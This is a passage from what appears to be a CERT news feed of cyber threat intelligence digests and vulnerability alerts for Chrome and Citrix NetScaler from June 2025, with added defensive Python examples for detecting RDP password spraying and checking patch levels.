        https://www.proofpoint.com/us/blog/threat-insight/10-things-i-hate-about-attribution-romcom-vs-transferloader
      • Tracing Blind Eagle To Proton66
        "Trustwave SpiderLabs, which has been tracking Proton66 for the last several months, was able to make this connection by pivoting from Proton66-linked assets, which led to the identification of another active threat cluster relying on the same ASN infrastructure. Pivoting identified what is assessed to be one of its most recent and operationally active infrastructure clusters, characterized by strong interconnections across multiple domains and IP address clusters. This infrastructure exclusively leverages Visual Basic Script (VBS) files as its initial attack vector, relies heavily on free Dynamic DNS (DDNS) services, and deploys readily available Remote Access Trojans (RATs) as a second-stage malware."
        https://www.trustwave.com/en-us/resources/blogs/spiderlabs-blog/tracing-blind-eagle-to-proton66/
        https://thehackernews.com/2025/06/blind-eagle-uses-proton66-hosting-for.html
      • Hide Your RDP: Password Spray Leads To RansomHub Deployment
        "This intrusion began in November 2024 with a password spray attack targeting an internet-facing RDP server. Over the course of several hours, the threat actor attempted logins against multiple accounts using known malicious IPs (based on OSINT). Several hours later they then logged in via RDP with one of the previously compromised users and ran a series of discovery commands, including various net commands to enumerate users and computers. Credential access tools, specifically Mimikatz and Nirsoft CredentialsFileView, were used to extract stored credentials and interact with LSASS memory."
        https://thedfirreport.com/2025/06/30/hide-your-rdp-password-spray-leads-to-ransomhub-deployment/
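        The intrusion above opens with a password spray against an internet-facing RDP server followed, hours later, by a successful logon with one of the sprayed accounts. The following detection logic is an added example for this digest, not code from The DFIR Report: it runs over a constructed export of Windows logon events (event 4625 failed logon, 4624 successful logon, logon type 10 for RDP; the sample lines, IPs and usernames are invented) and flags a source that fails against many distinct accounts in a short window, then lists any later successful logon from that source to an account it sprayed.

```python
"""Added example (not from The DFIR Report's write-up): detect the
password-spray pattern described above in a constructed export of Windows
logon events, then list sprayed accounts that later logged on."""
from collections import Counter, defaultdict
from datetime import datetime, timedelta
from typing import Dict, List, NamedTuple, Tuple

# Constructed sample (not real telemetry). One event per line:
# timestamp,event_id,source_ip,target_user,logon_type
# 4625 = failed logon, 4624 = successful logon; logon type 10 = RDP.
SAMPLE_LOG = """\
2024-11-02T03:10:05Z,4625,203.0.113.7,administrator,10
2024-11-02T03:10:09Z,4625,203.0.113.7,jsmith,10
2024-11-02T03:10:14Z,4625,203.0.113.7,mjones,10
2024-11-02T03:10:20Z,4625,203.0.113.7,svc_backup,10
2024-11-02T03:10:26Z,4625,203.0.113.7,rdoe,10
2024-11-02T03:10:31Z,4625,203.0.113.7,kpatel,10
2024-11-02T03:11:02Z,4625,10.0.0.23,jsmith,10
2024-11-02T03:11:40Z,4625,10.0.0.23,jsmith,10
2024-11-02T03:12:00Z,4624,10.0.0.23,jsmith,10
2024-11-02T08:45:12Z,4624,203.0.113.7,svc_backup,10
"""

TS_FMT = "%Y-%m-%dT%H:%M:%SZ"


class LogonEvent(NamedTuple):
    ts: datetime
    event_id: int
    src_ip: str
    user: str
    logon_type: int


def parse_events(text: str) -> List[LogonEvent]:
    """Parse the CSV-style export into time-ordered events."""
    events = []
    for line in text.splitlines():
        if not line.strip():
            continue
        ts, eid, ip, user, ltype = line.split(",")
        events.append(LogonEvent(datetime.strptime(ts, TS_FMT), int(eid),
                                 ip, user, int(ltype)))
    return sorted(events, key=lambda e: e.ts)


def detect_spray(events: List[LogonEvent], min_users: int = 5,
                 window: timedelta = timedelta(minutes=30)) -> Dict[str, List[str]]:
    """Map source IP -> sorted list of sprayed accounts for every IP that
    failed against at least `min_users` distinct accounts within `window`.
    Repeated failures for one account (10.0.0.23 above) are a lockout or
    typo pattern, not a spray, and are deliberately not reported."""
    failed = defaultdict(list)
    for e in events:
        if e.event_id == 4625:
            failed[e.src_ip].append(e)
    flagged: Dict[str, List[str]] = {}
    for ip, evs in failed.items():
        in_window = Counter()  # distinct users currently inside the window
        left = 0
        for e in evs:
            in_window[e.user] += 1
            while e.ts - evs[left].ts > window:  # slide the left edge forward
                in_window[evs[left].user] -= 1
                if in_window[evs[left].user] == 0:
                    del in_window[evs[left].user]
                left += 1
            if len(in_window) >= min_users:
                flagged[ip] = sorted({x.user for x in evs})
                break
    return flagged


def successes_after_spray(events: List[LogonEvent],
                          flagged: Dict[str, List[str]]) -> List[Tuple[str, str, str]]:
    """(src_ip, user, timestamp) for each successful logon from a flagged IP
    to an account that IP had sprayed: the pivot that needs an IR ticket."""
    hits = []
    for e in events:
        if e.event_id == 4624 and e.src_ip in flagged and e.user in flagged[e.src_ip]:
            hits.append((e.src_ip, e.user, e.ts.strftime(TS_FMT)))
    return hits


if __name__ == "__main__":
    evs = parse_events(SAMPLE_LOG)
    sprays = detect_spray(evs)
    for ip, users in sprays.items():
        print(f"spray from {ip}: {len(users)} accounts: {', '.join(users)}")
    for ip, user, ts in successes_after_spray(evs, sprays):
        print(f"ALERT {ts} successful RDP logon as {user} from sprayer {ip}")
```

        The threshold and window are tuning knobs: a low-and-slow spray of one attempt per account per hour will slip under a 30-minute window, so in production pair this with a longer-horizon count per source and, as the write-up's title says, keep RDP off the internet in the first place.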

      Breaches/Hacks/Leaks

      • Switzerland Says Government Data Stolen In Ransomware Attack
        "The government in Switzerland is informing that sensitive information from various federal offices has been impacted by a ransomware attack at the third-party organization Radix. The hackers have stolen data from Radix systems and later leaked it on the dark web, the Swiss government says. The exposed data is being analyzed with the help of the country’s National Cyber Security Centre (NCSC) to determine which government agencies are impacted and to what effect. “The foundation Radix has been targeted by a ransomware attack, during which data was stolen and encrypted,” announced the Swiss government."
        https://www.bleepingcomputer.com/news/security/switzerland-says-government-data-stolen-in-ransomware-attack/
      • Another Billing Software Vendor Hacked By Ransomware
        "Horizon Healthcare RCM is the latest revenue cycle management software vendor to report a health data breach involving ransomware and data theft. The firm's breach notification statement suggests that the company paid a ransom to prevent the disclosure of its stolen information. Horizon Healthcare RCM told Maine's attorney general in a breach report on June 27 that the incident affected six residents of that state."
        https://www.bankinfosecurity.com/another-billing-software-vendor-hacked-by-ransomware-a-28866
      • Norwegian Dam Valve Forced Open For Hours In Cyberattack
        "In a concerning incident this April, unidentified hackers managed to breach the control systems of a Norwegian dam. Reportedly, hackers breached the control systems of a Norwegian dam, causing its water valve to open fully. The incident occurred at the Lake Risevatnet dam, situated near the city of Svelgen in Southwest Norway. The valve remained open for four hours before the unauthorized activity was detected. According to the Norwegian energy news outlet, Energiteknikk, the hack did not pose a danger, as the water flow barely exceeded the dam’s minimum requirement. The valve released an additional 497 litres per second, but officials noted that the riverbed could handle a much larger volume, up to 20,000 litres per second."
        https://hackread.com/norwegian-dam-valve-forced-open-hours-in-cyberattack/
      • Swiss Nonprofit Health Organization Breached By Sarcoma Ransomware Group
        "The Swiss nonprofit health organization Radix has confirmed that its systems were breached by a ransomware group earlier this month. In a statement on Monday, the Zurich-based agency — which runs health promotion programs and online counseling services — said that the threat actor known as Sarcoma had published data stolen from its systems on a leak site. The Swiss government also issued a statement noting that "various federal offices" are among Radix's customers, and officials are evaluating what data was compromised. Radix has "no direct access" to government systems, the statement said."
        https://therecord.media/sarcoma-ransomware-breach-swiss-healthcare-nonprofit-radix

      General News

      • Third-Party Breaches Double, Creating Ripple Effects Across Industries
        "Supply chain risks remain top-of-mind for the vast majority of CISOs and cybersecurity leaders, according to SecurityScorecard. Their findings reveal that the way most organizations manage supply chain cyber risk isn’t keeping pace with expanding threats. Third-party involvement in breaches has doubled, rising from 15% to nearly 30%, according to the 2025 Verizon DBIR. A small group of third-party providers supports much of the world’s technology and infrastructure, creating an extreme concentration of risk. When even one of these providers is compromised, the ripple effects can disrupt thousands of organizations simultaneously."
        https://www.helpnetsecurity.com/2025/06/30/supply-chain-cyber-risks/
      • Are We Securing AI Like The Rest Of The Cloud?
        "In this Help Net Security interview, Chris McGranahan, Director of Security Architecture & Engineering at Backblaze, discusses how AI is shaping both offensive and defensive cybersecurity tactics. He talks about how AI is changing the threat landscape, the complications it brings to penetration testing, and what companies can do to stay ahead of AI-driven attacks. McGranahan also points out that human expertise remains essential, and we can’t depend on AI alone to protect cloud environments."
        https://www.helpnetsecurity.com/2025/06/30/chris-mcgranahan-backblaze-ai-cloud-security/
      • CISA And Partners Urge Critical Infrastructure To Stay Vigilant In The Current Geopolitical Environment
        "Today, CISA, in collaboration with the Federal Bureau of Investigation (FBI), the Department of Defense Cyber Crime Center (DC3), and the National Security Agency (NSA), released a Fact Sheet urging organizations to remain vigilant against potential targeted cyber operations by Iranian state-sponsored or affiliated threat actors. Over the past several months, there has been increasing activity from hacktivists and Iranian government-affiliated actors, which is expected to escalate due to recent events. These cyber actors often exploit targets of opportunity based on the use of unpatched or outdated software with known Common Vulnerabilities and Exposures or the use of default or common passwords on internet-connected accounts and devices."
        https://www.cisa.gov/news-events/alerts/2025/06/30/cisa-and-partners-urge-critical-infrastructure-stay-vigilant-current-geopolitical-environment
        https://www.cisa.gov/resources-tools/resources/iranian-cyber-actors-may-target-vulnerable-us-networks-and-entities-interest
        https://www.cisa.gov/sites/default/files/2025-06/joint-fact-sheet-Iranian-cyber-actors-may-target-vulnerable-US-networks-and-entities-of-interest-508c-1.pdf
        https://www.ic3.gov/CSA/2025/250630.pdf
        https://www.bleepingcomputer.com/news/security/us-warns-of-iranian-cyber-threats-on-critical-infrastructure/
        https://thehackernews.com/2025/06/us-agencies-warn-of-rising-iranian.html
        https://therecord.media/defense-vigilant-cyber-iran-israel
        https://www.infosecurity-magazine.com/news/iranian-cyber-threats-us/
      • Crypto Investment Fraud Ring Dismantled In Spain After Defrauding 5 000 Victims Worldwide
        "On 25 June 2025, the Spanish Guardia Civil, with the support of Europol and law enforcement from Estonia, France and the United States of America, arrested five members of a criminal network engaged in cryptocurrency investment fraud. The investigation identified that the perpetrators had laundered EUR 460 million in illicit profits stolen through crypto investment fraud from over 5 000 victims from around the world."
        https://www.europol.europa.eu/media-press/newsroom/news/crypto-investment-fraud-ring-dismantled-in-spain-after-defrauding-5-000-victims-worldwide
        https://www.bleepingcomputer.com/news/security/europol-helps-disrupt-540-million-crypto-investment-fraud-ring/
        https://thehackernews.com/2025/06/europol-dismantles-540-million.html
        https://www.infosecurity-magazine.com/news/taskforce-dismantles-euro460m/
        https://www.helpnetsecurity.com/2025/06/30/spain-crypto-fraud-arrests-2025/
      • Hired Hacker Assists Drug Cartel In Finding, Killing FBI Sources
        "The notorious Sinaloa Mexican drug cartel hired a hacker to conduct surveillance on persons of interest in the El Chapo case, which the cartel used to intimidate and kill potential FBI sources and witnesses, according to a government report. The US Department of Justice's Office of Inspector General (OIG) on Thursday published an audit of the FBI's efforts to mitigate what it calls "ubiquitous technical surveillance" (UTS) and the threat it poses to the bureau's operations and investigations. The OIG defines UTS as widespread data collection and analytics "for the purpose of connecting people to things, events, or locations.""
        https://www.darkreading.com/cyberattacks-data-breaches/hacker-drug-cartel-killing-fbi-sources
        https://oig.justice.gov/sites/default/files/reports/25-065_t.pdf
        https://www.bankinfosecurity.com/doj-cartel-hacked-phones-cameras-to-track-fbi-informants-a-28863
        https://www.theregister.com/2025/06/30/sinaloa_drug_cartel_hired_cybersnoop/
      • Why Cybersecurity Should Come Before AI In Schools
        "Artificial intelligence has become the hot new tech across schools, and why wouldn't it be? It's helping students digest dense historical texts and improve book reports, and it's helping teachers simplify complex math concepts. Academia wants to show students how to embrace this powerful technology safely — and in line with school rules — because unfortunately, we've already begun to see the dark side of AI in the "real" world. But that raises a very serious question: What are our students learning about cybersecurity?"
        https://www.darkreading.com/endpoint-security/cybersecurity-before-ai-schools
      • Android Threats Rise Sharply, With Mobile Malware Jumping By 151% Since Start Of Year
        "The Android threat landscape in the first half of 2025 has entered a new phase. An era marked not just by volume, but by coordination and precision. Attackers are no longer simply throwing malware at users and hoping for results. They’re building ecosystems. Recent Malwarebytes threat research data reveals a sharp rise in mobile threats across the board, with malware targeting Android devices up 151%. We’ve seen a 147% increase in spyware, a broad category of apps that collect user data without consent, with a notable spike in Feb and March. In fact, the February/March levels represent nearly a 4x multiplication of the baseline."
        https://www.malwarebytes.com/blog/news/2025/06/android-threats-rise-sharply-with-mobile-malware-jumping-by-151-since-start-of-year
      • Hacker Conversations: Rachel Tobac And The Art Of Social Engineering
        "Social engineering is the art of persuasion. Mostly, this is a good thing. Misused, it can have disastrous effects. Rachel Tobac is a cyber social engineer. She is skilled at persuading people to do what she wants, rather than what they know they ought to do. Does this make her a hacker? “Yes. I am a hacker. I hack people. I hack people over the phone, via email, by text message, across social media – and occasionally in person.” Social engineers hack people rather than computers. She is now co-founder and CEO of SocialProof Security."
        https://www.securityweek.com/hacker-conversations-rachel-tobac-and-the-art-of-social-engineering/
      • 'Disgruntled' British IT Worker Jailed For Hacking Employer After Being Suspended
        "A British IT worker who launched what police described as a cyberattack against his employer after being suspended from work has been jailed for seven months. According to West Yorkshire Police, within hours of his suspension in July 2022, Mohammed Umar Taj attempted to take revenge on his employer. The unidentified firm, which has clients in the United Kingdom as well as in Germany and Bahrain, said it suffered “significant disruption” and lost at least £200,000 (about $275,000) due to the attack, as well as suffered reputational harm."
        https://therecord.media/uk-it-worker-jailed-hacking-former-employer
        https://www.theregister.com/2025/06/30/british_rogue_admin/
        https://www.infosecurity-magazine.com/news/it-worker-jailed-revenge-attack/
      • DOJ Raids 29 ‘Laptop Farms’ In Operation Against North Korean IT Worker Scheme
        "Nearly 30 “laptop farms” across 16 states have been raided by U.S. law enforcement in recent months for their suspected role in a long-running North Korean IT worker scheme. The Justice Department on Monday announced a coordinated action that involved three indictments, one arrest, the seizure of 29 financial accounts and the shutdown of 21 websites alongside the laptop farm raids. FBI officials said the laptop farms allowed an undisclosed number of North Koreans to illegally work at more than 100 U.S. companies. The farms host work devices sent by legitimate companies who unwittingly hired North Koreans, allowing the employees to appear as if they are working from the U.S."
        https://therecord.media/doj-raids-laptop-farms-crackdown
        https://regmedia.co.uk/2025/06/30/doj-release.pdf
        https://cyberscoop.com/arrest-seizures-north-korean-it-workers-june-2025/
        https://www.bankinfosecurity.com/us-announces-crackdown-on-north-koreans-posing-as-workers-a-28864
        https://www.theregister.com/2025/06/30/us_north_korea_workers/

      Reference
      Electronic Transactions Development Agency (ETDA)

      Posted in Cyber Security News
      NCSA_THAICERT
    • US CISA adds a Citrix NetScaler vulnerability to the Known Exploited Vulnerabilities Catalog

      Posted in Cyber Security News
      NCSA_THAICERT
    • Hackers breached a dam control system in Norway and opened a water-release valve for 4 hours because a weak password was in use

      Posted in Cyber Security News
      NCSA_THAICERT
    • Alert: exploitation of a zero-day vulnerability in the Google Chrome browser

      On 1 July 2025, the Cyber Security Agency of Singapore (CSA) published an alert that Google has released a security update fixing a zero-day vulnerability in the Chrome browser. Users and administrators of affected products should update to the latest version immediately.

      Google's update addresses the zero-day vulnerability CVE-2025-6554 in Chrome.

      Impact
      The vulnerability is a type confusion bug in Chrome's V8 JavaScript engine. A remote attacker could use it to perform arbitrary memory reads and writes via a crafted HTML page; read/write primitives of this kind are typically chained into code execution in the renderer. The vulnerability is reported to be under active exploitation.

      The vulnerability affects Google Chrome versions earlier than the following:

      • Windows: versions before 138.0.7204.96/.97
      • Mac: versions before 138.0.7204.92/.93
      • Linux: versions before 138.0.7204.96

      Remediation
      Chrome users are advised to upgrade to the latest version. Automatic updates should also be enabled in Chrome so that fixes are received promptly; note that an update downloaded in the background only takes effect once the browser is relaunched.

      Reference
      https://www.csa.gov.sg/alerts-and-advisories/alerts/al-2025-065/

      Posted in Cyber Security News
      NCSA_THAICERT
    • Cloudflare launches an end-to-end encrypted video calling system and open-sources the code as "Orange Meets"

      Posted in Cyber Security News
      NCSA_THAICERT
    • Vulnerabilities in Bluetooth chips could let hackers eavesdrop through microphones and mobile phones

      Posted in Cyber Security News
      NCSA_THAICERT
    • Active exploitation of critical vulnerabilities in Citrix NetScaler ADC and NetScaler Gateway

      On 30 June 2025, the Cyber Security Agency of Singapore (CSA) published an alert on Citrix's security bulletin addressing several critical vulnerabilities in NetScaler ADC and NetScaler Gateway. Users and administrators of affected products are advised to update to the latest version immediately to reduce the risk of compromise.

      Citrix has released security updates for the critical vulnerabilities CVE-2025-5777 and CVE-2025-6543 in NetScaler ADC and NetScaler Gateway.

      Impact

      • CVE-2025-5777
        Allows an attacker to bypass authentication, including multi-factor authentication (MFA), by stealing session tokens that the vulnerability exposes, which can lead to unauthorized access to the appliance and the resources behind it.

      • CVE-2025-6543
        A memory-safety flaw that can be used for denial of service (DoS), affecting the availability of the system.

      Current status
      Recent reports indicate that both vulnerabilities are being exploited in the wild in multiple cases, so remediation is urgent.

      Affected products
      The vulnerabilities affect the following versions:

      • NetScaler ADC and NetScaler Gateway 14.1 before 14.1-43.56
      • NetScaler ADC and NetScaler Gateway 13.1 before 13.1-58.32
      • NetScaler ADC 13.1-FIPS and 13.1-NDcPP before 13.1-37.235
      • NetScaler ADC 12.1-FIPS before 12.1-55.328

      Remediation
      Users and administrators should update the affected appliances to the latest fixed build immediately. Because CVE-2025-5777 leaks session tokens, patching alone does not invalidate sessions an attacker may already have captured: after upgrading every node in an HA pair or cluster, terminate active sessions (NetScaler CLI: kill icaconnection -all and kill pcoipConnection -all) and review logs for sessions from unexpected source addresses.
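      Added example (not code from CSA, Citrix or Google): a small Python triage helper that checks a Chrome `--version` string against the fixed builds in the Chrome zero-day alert above, and a NetScaler `show version` line against the fixed builds listed in this Citrix alert. The thresholds are copied from the two alerts; the sample version strings are constructed, and whether an appliance is a FIPS or NDcPP edition is assumed to be known by the operator and passed in, because the build string alone does not say which edition is installed.

```python
import re

# Fixed Chrome builds per platform for CVE-2025-6554, copied from the advisory.
CHROME_FIXED = {
    "windows": (138, 0, 7204, 96),
    "mac": (138, 0, 7204, 92),
    "linux": (138, 0, 7204, 96),
}

# Fixed NetScaler builds per release line, copied from the CSA alert.
# Keyed by (release branch, variant); "" means the standard (non-FIPS) build.
NETSCALER_FIXED = {
    ("14.1", ""): (43, 56),
    ("13.1", ""): (58, 32),
    ("13.1", "FIPS"): (37, 235),
    ("13.1", "NDcPP"): (37, 235),
    ("12.1", "FIPS"): (55, 328),
}


def parse_chrome_version(text):
    """Return the 4-part version tuple from text such as
    'Google Chrome 138.0.7204.96' (the `google-chrome --version` format)."""
    m = re.search(r"(\d+)\.(\d+)\.(\d+)\.(\d+)", text)
    if not m:
        raise ValueError("no Chrome version found in %r" % text)
    return tuple(int(part) for part in m.groups())


def chrome_is_vulnerable(version_text, platform):
    """True if the installed build is older than the fixed build for the platform."""
    return parse_chrome_version(version_text) < CHROME_FIXED[platform.lower()]


def parse_netscaler_version(text):
    """Return (branch, (build, sub_build)) from `show version` output such as
    'NetScaler NS14.1: Build 43.47.nc, Date: ...'."""
    m = re.search(r"NS(\d+\.\d+):\s*Build\s+(\d+)\.(\d+)", text)
    if not m:
        raise ValueError("no NetScaler build found in %r" % text)
    return m.group(1), (int(m.group(2)), int(m.group(3)))


def netscaler_is_vulnerable(version_text, variant=""):
    """True if the build is below the fixed build for its release line.
    `variant` ("FIPS", "NDcPP" or "") is supplied by the operator (assumption:
    the edition is known, since the build string does not encode it).
    Returns None for release lines the alert does not list (e.g. 13.0 or
    non-FIPS 12.1); treat those as unverified, not as safe."""
    branch, build = parse_netscaler_version(version_text)
    fixed = NETSCALER_FIXED.get((branch, variant))
    if fixed is None:
        return None
    return build < fixed


if __name__ == "__main__":
    # Constructed sample inputs, not captured from real systems.
    for text, plat in [
        ("Google Chrome 138.0.7204.49", "linux"),
        ("Google Chrome 138.0.7204.96", "windows"),
    ]:
        print(text, plat, "vulnerable" if chrome_is_vulnerable(text, plat) else "patched")
    labels = {True: "vulnerable", False: "patched", None: "release line not in alert"}
    for text, variant in [
        ("NetScaler NS14.1: Build 43.47.nc, Date: (constructed)", ""),
        ("NetScaler NS13.1: Build 37.207.nc, Date: (constructed)", "FIPS"),
        ("NetScaler NS13.0: Build 92.31.nc, Date: (constructed)", ""),
    ]:
        print(text, variant or "standard", labels[netscaler_is_vulnerable(text, variant)])
```

      A None result is deliberate: a release line absent from the alert (13.0, or 12.1 without FIPS) is end-of-life rather than fixed, so the helper refuses to call it patched.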

      Reference
      https://www.csa.gov.sg/alerts-and-advisories/alerts/al-2025-064

      Posted in Cyber Security News
      NCSA_THAICERT
    • Cyber Threat Intelligence 30 June 2025

      Healthcare Sector

      • Feds Warn Patients, Healthcare Entities Of Phishing Scams
        "U.S. federal authorities are warning the public and healthcare sector organizations of email and fax phishing scams by fraudsters seeking to steal personal information about patients or payments. The warnings come as three large U.S. insurers continue to recover from recent cyberattacks. The FBI and its Internet Crime Complaint Center in a joint alert issued Friday warned the public about criminals impersonating legitimate health insurers and their investigative team members."
        https://www.bankinfosecurity.com/feds-warn-patients-healthcare-entities-phishing-scams-a-28852
        https://www.ic3.gov/PSA/2025/PSA250627
        https://www.theregister.com/2025/06/27/patients_providers_records_payment_scam/

      Vulnerabilities

      • Hackers Make Hay? Smart Tractors Vulnerable To Full Takeover
        "Researchers have figured out how to simultaneously spy on tens of thousands of smart tractors around the world, and even take full control over any of them. Smart farming is on the rise, in an effort to enhance farming practices by improving efficiency, reducing labor costs, and optimizing resources. Tractors are thus increasingly equipped with advanced technologies like GPS, sensors, and artificial intelligence, which enable them to operate autonomously in some cases, or be controlled remotely. In their most basic form, there's still someone inside the vehicle, but the tractor is connected to the cloud in order to get real-time weather data or location information, among other things."
        https://www.darkreading.com/cloud-security/hackers-hay-smart-tractors-vulnerable-takeover
      • How We Turned a Real Car Into a Mario Kart Controller By Intercepting CAN Data
        "If you went to our PTP Cyber Fest over the Infosec week you may have seen the PTP hack car being used as a games controller for the game SuperTuxKart (a free and open-source Mario Kart type game). You really could steer, accelerate and brake using the car, ‘driving’ the on screen kart! This was based on a silly idea I had last year as a way of making a more fun demo than just teaching people how to intercept and replay CAN messages. Here is the post that explains it."
        https://www.pentestpartners.com/security-blog/how-we-turned-a-real-car-into-a-mario-kart-controller-by-intercepting-can-data/
        https://www.theregister.com/2025/06/27/renault_clio_racing_controller/
      • Security Advisory: Airoha-Based Bluetooth Headphones And Earbuds
        "During our research on Bluetooth headphones and earbuds, we identified several vulnerabilities in devices that incorporate Airoha Systems on a Chip (SoCs). In this blog post, we briefly want to describe the vulnerabilities, point out their impact and provide some context to currently running patch delivery processes as described at this year’s TROOPERS Conference."
        https://insinuator.net/2025/06/airoha-bluetooth-security-vulnerabilities/
        https://www.bleepingcomputer.com/news/security/bluetooth-flaws-could-let-hackers-spy-through-your-microphone/

      Malware

      • Threat Spotlight: CVE-2025-5777: Citrix Bleed 2 Opens Old Wounds
        "Citrix released an advisory for CVE-2025-5777 affecting NetScaler ADC and Gateway devices, allowing attackers to hijack user sessions and bypass authentication. While no public reporting of exploitation for this vulnerability has emerged, ReliaQuest has observed indications of exploitation to gain initial access. Citrix recommends patching affected systems to the latest versions and terminating active sessions to mitigate session hijacking and further risks of exploitation."
        https://reliaquest.com/blog/threat-spotlight-citrix-bleed-2-vulnerability-in-netscaler-adc-gateway-devices/
        https://www.bleepingcomputer.com/news/security/citrix-bleed-2-flaw-now-believed-to-be-exploited-in-attacks/
        https://www.darkreading.com/vulnerabilities-threats/citrixbleed-2-active-exploitation
        https://www.infosecurity-magazine.com/news/citrixbleed-2-vulnerability/
        https://www.securityweek.com/evidence-suggests-exploitation-of-citrixbleed-2-vulnerability/
      • Case Of Attacks Targeting South Korean Web Servers Using MeshAgent And SuperShell
        "Lately, attacks on South Korean web servers utilizing MeshAgent and SuperShell have been identified. The presence of ELF-based malware at the malicious code distribution address suggests that the attackers are targeting not only Windows servers but also Linux servers. It is assumed that the attackers installed a web shell using a file upload vulnerability and used it to install additional payloads. Through reconnaissance and lateral movement, the attackers attempted to infect not only the compromised system but also other systems within the organization."
        https://asec.ahnlab.com/en/88627/
      • Scattered Spider Hackers Shift Focus To Aviation, Transportation Firms
        "Hackers associated with "Scattered Spider" tactics have expanded their targeting to the aviation and transportation industries after previously attacking insurance and retail sectors. These threat actors have employed a sector-by-sector approach, initially targeting retail companies, such as M&S and Co-op, in the United Kingdom and the United States and subsequently shifting their focus to insurance companies. While the threat actors were not officially named as responsible for insurance sector attacks at first, recent incidents have impacted Aflac, Erie Insurance, and Philadelphia Insurance Companies."
        https://www.bleepingcomputer.com/news/security/scattered-spider-hackers-shift-focus-to-aviation-transportation-firms/
        https://thehackernews.com/2025/06/fbi-warns-of-scattered-spiders.html
        https://securityaffairs.com/179413/cyber-crime/the-fbi-warns-that-scattered-spider-is-now-targeting-the-airline-sector.html
      • Scattered Spider’s Calculated Path From CFO To Compromise
        "“Scattered Spider” targets executive and administrative accounts, exploiting human trust and workflows to bypass multi-factor authentication (MFA) and infiltrate critical systems. The group showed technical sophistication by dumping NTDS.dit and harvesting over 1,400 secrets. By leveraging unmanaged virtual machines (VMs), ngrok, and privileged service principals, Scattered Spider maintained persistence while evading detection. To counter these threats, organizations should monitor privileged accounts, enforce strict identity verification protocols, implement hypervisor-level logging, conduct social engineering assessments, and train employees to recognize manipulation tactics."
        https://reliaquest.com/blog/scattered-spiders-calculated-path-from-cfo-to-compromise/
        https://www.darkreading.com/cloud-security/scattered-spider-cfo-scorched-earth-attack
        https://www.bankinfosecurity.com/teardown-how-scattered-spider-hacked-logistics-firm-a-28846
      • The New Face Of Remcos: Path Bypass And Masquerading
        "Since last year and well into this year, Remcos malware campaigns stayed very active, continually morphing to stay hidden. Attackers usually send phishing emails with malicious files like malicious shortcuts, scripts or documents. When a victim opens the file, it quietly drops the Remcos program and hides it in new folders with similar names to legitimate Windows system folders on the PC. Once installed, Remcos lets the attackers control the PC, steal passwords and record keystrokes. The malware keeps a backdoor open by setting up scheduled tasks or other sneaky tricks. This way, they stay on the system for a long time without being detected."
        https://www.forcepoint.com/blog/x-labs/remcos-malware-new-face
        https://hackread.com/remcos-malware-campaigns-hit-businesses-and-schools/
      • Fake DocuSign Email Hides Tricky Phishing Attempt
        "On my daily rounds, I encountered a phishing attempt that used a not completely unusual, yet clever delivery method. What began as a seemingly routine DocuSign notification turned into a multi-layered deception involving Webflow, a shady redirect, and a legitimate Google login page. Webflow is a visual website builder that allows designers and developers to create custom, responsive websites. It’s a no-code solution that allows users to visually design, build, and launch websites directly in the browser. The attack all starts with an email claiming to be from a known contact, referencing a completed DocuSign document."
        https://www.malwarebytes.com/blog/news/2025/06/fake-docusign-email-hides-tricky-phishing-attempt
      • DeepSeek Deception: Sainbox RAT & Hidden Rootkit Delivery
        "Netskope Threat Labs has discovered a campaign using fake installers to deliver the Sainbox RAT and Hidden rootkit. During our threat hunting activities, we encountered multiple installers disguised as legitimate software, including WPS Office, Sogou, and DeepSeek. These installers were mainly MSI files that were delivered via phishing websites. Both the phishing pages and installers were in Chinese, indicating that the targets are Chinese speakers. We can attribute this attack to Silver Fox (a China-based adversary group) with medium confidence based on the TTPs, particularly the phishing websites, the fake installers for popular Chinese software, the use of Gh0stRAT variants, and the targeting of Chinese speakers."
        https://www.netskope.com/blog/deepseek-deception-sainbox-rat-hidden-rootkit-delivery
        https://thehackernews.com/2025/06/chinese-group-silver-fox-uses-fake.html
        https://www.securityweek.com/chinese-hackers-target-chinese-users-with-rat-rootkit/
      • Hive0154 Aka Mustang Panda Shifts Focus On Tibetan Community To Deploy Pubload Backdoor
        "In June 2025, IBM X-Force researchers discovered China-aligned threat actor, Hive0154, spreading Pubload malware featuring lure documents and filenames targeting the Tibetan community. The Tibetan sovereignty dispute is often invoked by Chinese threat groups in their cyber operations, with the latest campaign coinciding with activities leading up to a major event for the Tibetan community, the Dalai Lama's 90th birthday."
        https://www.ibm.com/think/x-force/hive0154-mustang-panda-shifts-focus-tibetan-community-deploy-pubload-backdoor
        https://thehackernews.com/2025/06/pubload-and-pubshell-malware-used-in.html
      • GIFTEDCROOK’s Strategic Pivot: From Browser Stealer To Data Exfiltration Platform During Critical Ukraine Negotiations
        "The Arctic Wolf® Labs team has discovered that the cyber-espionage group UAC-0226, known for utilising the infostealer GIFTEDCROOK, has significantly evolved its capabilities. It has transitioned the malware from a basic browser data stealer (which we’re referring to as v1), through two new upgrades (v1.2 and v1.3) into a robust intelligence-gathering tool. Analysis of early files from February 2025 suggests that the GIFTEDCROOK project began as a demo during that period. It subsequently matured and was put into production in March 2025, with new capabilities continuously being developed and added since then."
        https://arcticwolf.com/resources/blog-uk/giftedcrooks-strategic-pivot-from-browser-stealer-to-data-exfiltration-platform-during-critical-ukraine-negotiations/
        https://thehackernews.com/2025/06/giftedcrook-malware-evolves-from.html
      • Anubis Ransomware Targets Global Victims With Wiper Functionality
        "This blog provides a detailed technical analysis of Anubis ransomware, an emerging RaaS threat known for combining data encryption with an optional file-wiping feature that permanently destroys victim data. By mapping its behavior to the MITRE ATT&CK Enterprise framework, we explore the full attack chain, from initial access via spear-phishing to the use of ECIES-based encryption and file-wiping mechanisms that amplify impact."
        https://www.picussecurity.com/resource/blog/anubis-ransomware-targets-global-victims-with-wiper-functionality

      Breaches/Hacks/Leaks

      • Hawaiian Airlines Discloses Cyberattack, Flights Not Affected
        "Hawaiian Airlines, the tenth-largest commercial airline in the United States, is investigating a cyberattack that has disrupted access to some of its systems. With over 7,000 employees, 235 average daily flights, and a fleet of over 60 airplanes, Hawaiian Airlines connects Hawai'i with 15 U.S. mainland cities and 10 other destinations across Asia and the Pacific. The airline stated in a statement issued on Thursday morning that the incident didn't affect flight safety and has already contacted relevant authorities to assist in investigating the attack."
        https://www.bleepingcomputer.com/news/security/hawaiian-airlines-discloses-cyberattack-flights-not-affected/
        https://therecord.media/hawaiian-airlines-cyberattack-flights-safe
        https://cyberscoop.com/scattered-spider-aviation-hawaiian-airlines-cyberattack/
        https://www.infosecurity-magazine.com/news/hawaiian-airlines-cybersecurity/
        https://www.theregister.com/2025/06/27/aloha_youve_been_pwned_hawaiian/
      • Retail Giant Ahold Delhaize Says Data Breach Affects 2.2 Million People
